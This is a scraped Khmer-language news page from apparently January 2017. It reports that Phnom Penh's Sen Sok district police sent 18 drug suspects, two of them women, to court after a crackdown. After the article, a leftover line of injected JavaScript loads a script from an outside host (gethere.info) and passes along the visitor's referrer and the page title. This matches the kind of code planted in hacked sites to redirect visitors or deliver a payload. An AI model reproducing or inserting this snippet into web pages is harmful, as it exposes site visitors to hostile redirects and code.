ព្រឹតិ្តការណ៍ថ្មីៗ

បញ្ជូនខ្លួនជនសង្ស័យ១៨នាក់ទៅតុលាការក្នុងនោះមានស្ត្រី០២នាក់ផងពាក់ព័ន្ធរឿងប្រើប្រាស់និងជួញដូរគ្រឿងញៀន

1 ឆ្នាំ មុន 1 តូ សុផល

ភ្នំពេញ:ជនសង្ស័យ១៨ នាក់ក្នុងនោះមានស្ត្រី០២នាក់ផងត្រូវបានសមត្ថកិច្ចនគរបាលខណ្ឌសែនសុខកសាងសុំនុំរឿងបញ្ជូនទៅកាន់សាលាសំបូងរាជធានីភ្នំពេញដោយជាប់ពាក់ព័ន្ធជួញដូរនិងប្រើប្រាស់គ្រឿងញៀន។កាលពីម៉ោង០៨និង៣០ព្រឹកថ្ងៃទី ១៣មករា ឆ្នាំ២០១៧នេះក្រោយពីឃាត់ខ្លួនយកមកសាកសួរនិងធ្វើតេសទឹកនោមឃើញមានផ្ទុកនូវសារធាតុញៀនរួចមក។
សមត្ថកិច្ចបានប្រាប់ថាជនសង្ស័យដែលបញ្ជូនទៅព្រឹកនេះមាន១៨នាក់ក្នុងនោះស្ត្រី០២សុទ្ធតែពាក់ព័ន្ធជួញដូរនិងប្រាស់គ្រឿងដែលសមត្ថកិច្ចបង្ក្រាបថ្មីៗនេះនៅក្នុងមូកដ្ឋាន។

លោកវរៈសេនីយ៍ឯក ម៉ក់ ហុង អធិការខណ្ឌបានមានប្រសាសថានាដើមឆ្នាំ២០១៧នេះជាយុទ្ធនាការបង្ក្រាបគ្រឿង
ញៀនទូទាំងប្រទេសនិងដោយមានបទបញ្ជារពីលោកអគ្គស្នងការរងនិងជាស្នងការរាជធានីភ្នំពេញនិងសំរបសំរួលពីព្រះរាជ អាជ្ញរងនៃអយ្យការអមសាលា ដំបូងរាជធានីភ្នំពេញបានបញ្ជាមកលោកអោយចុះសហការណ៍និងបង្ក្រាបក្នុងមូលដ្ឋានទើបលោកដឹកនាំកំលាំងដោយសហការណ៍សាលាខណ្ឌសែនសុខនិងជាមួយកម្លាំងតាមបណ្តាលប៉ុស្តិ៍ទាំង៤ក្នុងមូលដ្ឋានចុះមកបង្ក្រាបអោយដូចភ្លៀងរលឹមពិសេសតំបន់មុខមន្ទីពេទ្យព្រៈកុសុមៈនិងឃាត់ខ្លួនបានក្រុមខាងលើនេះតែម្តង។

លោកបានបញ្ជាកមប្រាប់ថាតាំងពីថ្ងៃយុទ្ធនាកាពីថ្ងៃ០១មករាមកដល់ថ្ងៃទី១៣មករានេះកម្លាំងលោកបានបង្ក្រាបទាំងអ្នកប្រើប្រាស់និងជួញដូរនោះមិនក្រោមពី១០០នាក់ទេដែលបង្ក្រាបបានច្រើនជាងគេក្នុង១២ខណ្ឌទូទាំងរាជធានី។

គួររំលឹកថាជនសង្ស័យទាំង១៨នាក់ខាងលើនេះត្រូវបានឃាត់ខ្លួនជាបន្តរបន្ទាប់ក្នុងសង្កាត់ទាំង០៤របស់ខណ្ឌសែនសុខក្រោយពីធ្វើការសាកសួរនិងធ្វើតេសទៅលើទំនោមចប់ក៍បានបញ្ជូនខ្លួនទៅកាន់សាលាដំបូងរាជធានីភ្នំពេញនាព្រឹកនេះតែម្តង។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ